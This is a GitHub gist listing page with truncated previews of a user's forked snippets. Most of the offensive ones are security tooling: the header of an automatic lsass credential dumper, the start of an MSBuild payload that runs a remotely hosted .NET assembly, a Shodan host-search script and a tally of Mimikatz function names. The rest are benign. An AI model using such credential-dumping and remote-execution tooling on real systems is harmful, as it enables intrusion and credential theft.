Skip to content

Instantly share code, notes, and snippets.

View cephurs's full-sized avatar

cephurs

145 followers · 1.3k following
View GitHub Profile
@cephurs
cephurs / autoProc.py
Created August 23, 2019 16:52 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
@cephurs
cephurs / attack.csl
Created May 8, 2019 06:32 — forked from JohnLaTwC/attack.csl
Azure Sentinel Password spray query
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
@cephurs
cephurs / badkeyboard.js
Created January 13, 2019 21:59 — forked from Shadow0ps/badkeyboard.js
// ██████╗ █████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██████╗ ██████╗ █████╗ ██████╗ ██████╗ ██╗
// ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔════╝╚██╗ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██╔══██╗██╔══██╗██║
// ██████╔╝███████║██║ ██║█████╔╝ █████╗ ╚████╔╝ ██████╔╝██║ ██║███████║██████╔╝██║ ██║██║
// ██╔══██╗██╔══██║██║ ██║██╔═██╗ ██╔══╝ ╚██╔╝ ██╔══██╗██║ ██║██╔══██║██╔══██╗██║ ██║╚═╝
// ██████╔╝██║ ██║██████╔╝██║ ██╗███████╗ ██║ ██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝██╗
// ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═╝
// No Donut!
// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
// Not for malicious use. You assume all responsibility for anything you do with this. Don't be a jerk. If I find out you used this to hurt people.
// Just remember TAKEN. Get what I'm sayin?
@cephurs
cephurs / mimistack
Created December 19, 2018 06:03 — forked from itsreallynick/mimistack
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
@cephurs
cephurs / dracula_theme.vt
Created December 10, 2018 18:30 — forked from grugq/dracula_theme.vt
Dracula theme for the Linux console
# Dracula Theme for Consoles
#
# Console colors are set by the `setvtrgb` command which takes as argument a
# file of exactly three lines of text. These lines are the 0..255 values for
#
# red: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
# grn: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
# blu: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
#
# Needless to say, this is a very annoying format. Here are the values for
@cephurs
cephurs / Instructions.txt
Created December 2, 2018 14:53 — forked from NotMedic/Instructions.txt
Siri -> HomeBridge -> HomeBridge-ssh -> iptables
This is a pretty simple setup:
Siri is used to control Homebridge using the HomeKit protocol.
Homebridge has a module named Homebridge-ssh that allows you to run commands over ssh.
There is a shell script on an OpenWrt box to enable, disable, and check the status of a MAC Address block in the FORWARD table.
1. Install node on your platform. I went with 8.9 for no specific reason other than I initially had issues with 10 that probably weren't related..
2. Install homebridge and homebridge-ssh. You should probably also put hombridge-config-ui-x on there too... I used the unsafe-perm parameter after getting a significant number of errors:
sudo -i npm install -g homebridge --unsafe-perm
sudo -i npm install -g homebridge-ssh --unsafe-perm
@cephurs
cephurs / msBuildDemo.xml
Created November 27, 2018 23:21 — forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
@cephurs
cephurs / delete-twitter-dm.js
Created November 7, 2018 14:50 — forked from taviso/delete-twitter-dm.js
Automate deleting twitter direct messages.
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@cephurs
cephurs / pinger.bat
Created October 30, 2018 13:44 — forked from shhivam/pinger.bat
@ECHO OFF
set IPADDRESS=x.x.x.x
set INTERVAL=3
:PINGINTERVAL
ping google.com
timeout %INTERVAL%
GOTO PINGINTERVAL
@cephurs
cephurs / picanha.py
Created September 23, 2018 15:19 — forked from tmap/picanha.py
import shodan
import sys
import requests
API_KEY = "apitoken"
try:
api = shodan.Shodan(API_KEY)
result = api.search('port:3000 product:"Apache httpd" centOS')